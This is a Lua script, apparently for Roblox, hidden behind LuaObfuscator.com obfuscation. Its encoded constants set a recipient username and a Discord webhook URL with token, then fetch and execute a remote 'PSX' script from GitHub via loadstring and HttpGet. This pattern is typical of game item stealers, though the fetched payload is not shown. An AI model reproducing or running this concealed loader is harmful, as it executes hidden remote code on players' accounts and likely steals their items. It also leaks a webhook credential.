--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16)local v17=1;local v18;v15=v4(v3(v15,5),"..",function(v29)if (v1(v29,2)==79) then v18=v0(v3(v29,1,1));return "";else local v63=v2(v0(v29,16));if v18 then local v73=v5(v63,v18);v18=nil;return v73;else return v63;end end end);local function v19(v30,v31,v32)if v32 then local v64=(v30/((1 + 0 + 1)^(v31-(1 + 0))))%(2^(((v32-(3 -2)) -(v31-(1 + 0))) + (1254 -(62 + 1191))));return v64-(v64%(1 -0));else local v65=0 -0;local v66;while true do if ((467 -(262 + 205))==v65) then v66=(1 + 1)^(v31-(1 + 0 + 0));return (((v30%(v66 + v66))>=v66) and (3 -2)) or (0 + 0);end end end end local function v20()local v37=0;local v38;while true do if (v37==(1 + (391 -(138 + 253)))) then return v38;end if (v37==(1672 -(37 + 1635))) then v38=v1(v15,v17,v17);v17=v17 + (1719 -(756 + 962));v37=1 + 0;end end end local function v21()local v39=0 -0;local v40;local v41;while true do if (v39==(1904 -(562 + 1341))) then return (v41 * (381 -(43 + 82))) + v40;end if (v39==0) then v40,v41=v1(v15,v17,v17 + 1 + 1);v17=v17 + 2 + 0;v39=2 -(3 -2);end end end local function v22()local v42,v43,v44,v45=v1(v15,v17,v17 + 3);v17=v17 + 3 + 1;return (v45 * 16777216) + (v44 * (256769 -191233)) + (v43 * (286 -(29 + 1))) + v42;end local function v23()local v46=v22();local v47=v22();return (( -(1 + (259 -(41 + 217))) * v19(v47,5 + 27)) + (1 -0)) * ((1 + (1212 -(857 + 354)))^(v19(v47,95 -(200 -126),65 -(1864 -(1442 + 388))) -(3487 -2464))) * ((((v19(v47,468 -(251 + 216),55 -35) * ((2 + 0)^(51 -19))) + v46)/((870 -(87 + 781))^(142 -(464 -(206 + 168))))) + (1993 -(1900 + 92)));end local function v24(v33)local v48=1156 -(32 + (2404 -(1216 + 64)));local v49;local v50;while true do if (v48==(2 -1)) then v49=v3(v15,v17,(v17 + v33) -(1 + 0));v17=v17 + v33;v48=2 + 0;end if (v48==3) then return v6(v50);end if (v48==(6 -4)) then v50={};for v74=1 + 0, #v49 do v50[v74]=v2(v1(v3(v49,v74,v74)));end v48=4 -1;end if (v48==0) then v49=nil;if  not v33 then v33=v22();if (v33==0) then return "";end end v48=(171 + 1179) -(826 + 523);end end end local v25=v22;local function v26(...)return {...},v11("#",...);end local function v27()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51~=1) then else v54=nil;v55=nil;v51=2;end if (v51==2) then v56=nil;v57=nil;v51=3;end if (v51==4) then while true do if (v52==3) then v59=nil;while true do local v77=0;while true do if (v77==(0 + 0)) then if (v53==2) then local v95=0 + 0;local v96;while true do if (v95~=(0 + 0)) then else v96=329 -(323 + 6);while true do if (v96==0) then for v108=1,v58 do local v109=685 -(220 + 465);local v110;local v111;while true do if (v109==(1 -0)) then if (v110==(1374 -(250 + 1123))) then v111=v20()~=(0 -0);elseif (v110==2) then v111=v23();elseif (v110==(3 + 0)) then v111=v24();end v59[v108]=v111;break;end if (v109~=(0 -0)) then else v110=v20();v111=nil;v109=1;end end end v57[3]=v20();v96=1;end if (v96~=(2 -1)) then else for v112=1,v22() do local v113=0 + 0;local v114;local v115;while true do if (v113==(1265 -(1208 + 56))) then while true do if (v114==(0 -0)) then v115=v20();if (v19(v115,3 -2,1)==0) then local v137=1243 -(1143 + 100);local v138;local v139;local v140;local v141;while true do if (v137==1) then local v145=0;while true do if (v145~=1) then else v137=1142 -(480 + 660);break;end if (v145~=(0 + 0)) then else v140=nil;v141=nil;v145=1;end end end if (v137==(2 + 0)) then while true do if (v138==(1 + 1)) then local v146=0 -0;while true do if (v146==(1977 -(1224 + 752))) then v138=3;break;end if (v146==(0 -0)) then if (v19(v140,3 -2,4 -3)==1) then v141[7 -5]=v59[v141[1230 -(1095 + 133)]];end if (v19(v140,1 + 1,2)==(1 -0)) then v141[1 + 2]=v59[v141[3]];end v146=1102 -(677 + 424);end end end if (v138~=(10 -7)) then else if (v19(v140,14 -11,3)==(4 -3)) then v141[13 -9]=v59[v141[4]];end v54[v112]=v141;break;end if (v138==1) then local v148=0;while true do if (v148==(0 + 0)) then local v152=0 + 0;while true do if (v152==0) then v141={v21(),v21(),nil,nil};if (v139==(346 -(106 + 240))) then local v155=0;local v156;local v157;while true do if (v155~=(432 -(415 + 16))) then else while true do if (0~=v156) then else v157=0 -0;while true do if (v157==(0 + 0)) then v141[3 + 0]=v21();v141[4]=v21();break;end end break;end end break;end if (v155~=0) then else local v159=1028 -(811 + 217);while true do if (v159==(1 + 0)) then v155=1 + 0;break;end if (v159~=(1915 -(825 + 1090))) then else v156=1027 -(557 + 470);v157=nil;v159=1;end end end end elseif (v139==(1 + 0)) then v141[1 + 2]=v22();elseif (v139==2) then v141[1526 -(1028 + 495)]=v22() -((2 -0)^(39 -23));elseif (v139==(1 + 2)) then local v161=0;local v162;local v163;while true do if (v161~=1) then else while true do if ((0 -0)==v162) then v163=0 -0;while true do if (v163==0) then v141[1668 -(1630 + 35)]=v22() -(2^(25 -9));v141[4]=v21();break;end end break;end end break;end if (v161==0) then local v166=0;while true do if (v166==(0 + 0)) then v162=0 -0;v163=nil;v166=1 + 0;end if (v166==(1 + 0)) then v161=1;break;end end end end end v152=1;end if (1==v152) then v148=1;break;end end end if (v148~=1) then else v138=2;break;end end end if (v138==(1073 -(479 + 594))) then local v149=0;while true do if (1~=v149) then else v138=1 + 0;break;end if (v149~=(1282 -(1124 + 158))) then else v139=v19(v115,2 + 0,689 -(567 + 119));v140=v19(v115,4,6);v149=1;end end end end break;end if (v137==(0 + 0)) then v138=1262 -(373 + 889);v139=nil;v137=1 + 0;end end end break;end end break;end if (v113~=0) then else v114=0;v115=nil;v113=193 -(188 + 4);end end end v53=3;break;end end break;end end end if (v53==1) then local v97=0 + 0;local v98;while true do if (v97==0) then v98=0 + 0;while true do if (v98==1) then v59={};v53=2;break;end if (v98~=0) then else local v107=921 -(402 + 519);while true do if (v107~=(0 + 0)) then else v57={v54,v55,nil,v56};v58=v22();v107=1;end if (v107~=1) then else v98=1;break;end end end end break;end end end v77=1;end if (v77==(2 -1)) then if (0~=v53) then else local v99=0 -0;while true do if (v99~=(0 -0)) then else v54={};v55={};v99=1;end if (v99==(1 + 0)) then v56={};v53=1 + 0;break;end end end if (v53==3) then local v100=0;while true do if (v100~=(1129 -(378 + 750))) then else return v57;end if (v100~=(1413 -(559 + 854))) then else for v102=1 -0,v22() do v55[v102-1]=v27();end for v104=1 + 0,v22() do v56[v104]=v22();end v100=1;end end end break;end end end break;end if (v52~=(1 + 0)) then else v55=nil;v56=nil;v52=5 -3;end if ((0 + 0)==v52) then v53=0 + 0;v54=nil;v52=1 + 0;end if ((1426 -(999 + 425))==v52) then local v76=0;while true do if (v76~=(0 + 0)) then else v57=nil;v58=nil;v76=1;end if (1==v76) then v52=3;break;end end end end break;end if (v51==3) then v58=nil;v59=nil;v51=4;end if (v51==(0 -0)) then v52=0;v53=nil;v51=1;end end end local function v28(v34,v35,v36)local v60=v34[1];local v61=v34[2];local v62=v34[3];return function(...)local v67=0;local v68;local v69;local v70;local v71;local v72;while true do if (v67==1) then v70={...};v71=v11("#",...) -1;v67=2;end if (v67==3) then A,B=v26(v10(v72));if  not A[1] then local v78=v34[4][v68] or "?";error("Script error at ["   .. v78   .. "]:"   .. A[2]);else return v12(A,2,B);end break;end if (v67==0) then v68=1;v69= -1;v67=1;end if (2==v67) then v72=nil;function v72()local v79=v60;local v80=Const;local v81=v61;local v82=v62;local v83=v26;local v84={};local v85={};local v86={};for v90=0 -(0 -0),v71 do if (((3187 -(411 + 244))>((2150 -(68 + 340)) -(3607 -2505))) and (v90>=v82)) then v84[v90-v82]=v70[v90 + (4 -3)];else v86[v90]=v70[v90 + 1 + 0];end end local v87=(v71-v82) + (1 -0);local v88;local v89;while true do local v91=0;local v92;while true do if ((((46 -34) + 44)<(1820 + 29)) and (v91==(0 + 0))) then v92=0 -0;while true do if (((575 + 125 + 75)<((3734 + 735) -(185 + 2145))) and (v92==(0 + 0))) then local v101=0 + 0;while true do if (((4 -(11 -8))==v101) or ((319 + (747 -(126 + 31)))==(2346 + 1613))) then v92=3 -2;break;end if (((2280 -(491 + 845))<(2231 + 758)) and (v101==(0 -0))) then v88=v79[v68];v89=v88[(442 -(250 + 190)) -1];v101=171 -(150 + 20);end end end if ((v92==(1 + 0 + 0)) or (2561<=(605 + 27))) then if ((v89<=(5 -(7 -5))) or (((35783 -22336) -9526)<(668 -242))) then if (((9548 -5988)>(8026 -4619)) and (v89<=(1033 -(445 + 587)))) then if (((4380 -2604)<=(3826 -1292)) and (v89==(0 + (0 -0)))) then do return;end else v86[v88[4 -(785 -(372 + 411))]]();end elseif ((v89>(4 -2)) or ((524 -(59 + 8))>(2386 + 689))) then local v116=(0 + 0) -0;local v117;while true do if (((94 + 969)<(1844 -(279 + 94))) and (v116==(338 -(209 + 129)))) then v117=v88[(3 + 3) -4];v86[v117]=v86[v117](v12(v86,v117 + 1 + 0,v69));break;end end else v36[v88[557 -(128 + 426)]]=v86[v88[1740 -(1268 + 470)]];end elseif (((3348 -(165 + 1290))<(7580 -2779)) and (v89<=(1907 -(221 + 1681)))) then if ((v89==(2 + 2)) or ((26 + 3052)<(4038 -(594 + 438)))) then v86[v88[3 -(570 -(413 + 156))]]=v36[v88[1555 -(318 + 1234)]];else local v120=19 -(9 + 10);local v121;local v122;while true do if ((v120==(0 -(0 -0))) or (998>=(532 + 3441))) then local v133=1777 -(341 + 1436);while true do if (((4246 -(1088 + 93))<(7979 -3902)) and (v133==((779 -(93 + 684)) -(1 + 0)))) then v120=1 -0;break;end if ((v133==(0 -0)) or ((3539 -(8 + 252))<(2573 -(6 + 212)))) then v121=v88[208 -((2021 -(70 + 1900)) + 155)];v122=v86[v88[108 -(14 + 91)]];v133=1 + 0;end end end if (((434 -95)<=((4161 -946) -1076)) and (v120==(1588 -(515 + 1072)))) then v86[v121 + 1 + 0]=v122;v86[v121]=v122[v88[6 -2]];break;end end end elseif ((v89<=(23 -17)) or ((1035 + 3039)<(7544 -4676))) then local v123=103 -(5 + 98);local v124;local v125;local v126;local v127;local v128;while true do if ((v123==(1626 -(244 + 1382))) or ((4338 -902)==(1573 -(277 + 241 + 9)))) then v124=0 -0;v125=nil;v123=2 -1;end if (((630 + 1090)>=((4090 -(988 + 621)) -901)) and (v123==(1598 -(539 + 1057)))) then v128=nil;while true do if ((v124==(1 + 1)) or ((6422 -1635)<(268 + 1659))) then for v142=v125,v69 do local v143=1782 -(1762 + 20);local v144;while true do if (((259 -143)<=(860 + 1427)) and ((0 + 0 + 0)==v143)) then v144=0;while true do if ((v144==(0 -0)) or ((5008 -(307 + 765))<=(8028 -4424))) then v128=v128 + 1;v86[v142]=v126[v128];break;end end break;end end end break;end if ((v124==(579 -(48 + 531))) or ((2374 -(3288 -(714 + 926)))>=(2903 -(1434 -(158 + 343))))) then local v136=0;while true do if (((576 + 93)<(11285 -6399)) and (v136==(1 + (448 -(190 + 258))))) then v124=2 -1;break;end if ((3049>=(2659 -(151 + 1754))) and (v136==(1281 -(18 + 1263)))) then v125=v88[2 -0];v126,v127=v83(v86[v125](v12(v86,v125 + (1930 -(1364 + 565)),v88[13 -10])));v136=1 + 0;end end end if ((v124==(1254 -(1052 + 201))) or ((2870 -(1705 + 150))>(1710 -(192 + 13)))) then v69=(v127 + v125) -(3 -(5 -3));v128=0 -0;v124=427 -(243 + 182);end end break;end if ((v123==(1 + 0)) or ((1338 + 12)>(967 + 2453))) then v126=nil;v127=nil;v123=2 + 0;end end elseif ((v89>(5 + 2)) or ((2889 -(213 + 1))<(197 + 1373))) then v86[v88[(2 -0) + 0]]=v88[7 -4]~=(709 -(131 + 578));else v86[v88[1994 -(498 + 1494)]]=v88[(52 + 82) -(94 + 37)];end v68=v68 + (1 -0);break;end end break;end end end end v67=3;end end end;end return v28(v27(),{},v16)();end v14("LOL!083O0003083O00557365724E616D6503083O0078764574682O616E03073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130353132373039323833343631333O36372F636C39564E435135445A4A756232574F717275314C556765715F695841466A6E724B3157713665717A6F2D2O776F2D70616B4C6873514A71796A51324C31496A7A326878030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403403O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F5053582F6D61696E2F5363726970742E6C7561000D3O0012073O00023O0012023O00013O0012073O00043O0012023O00033O0012043O00053O001204000100063O002005000100010007001207000300084O0008000400014O0006000100044O00035O00022O00013O000100016O00017O000D3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00043O00053O00",v8());end
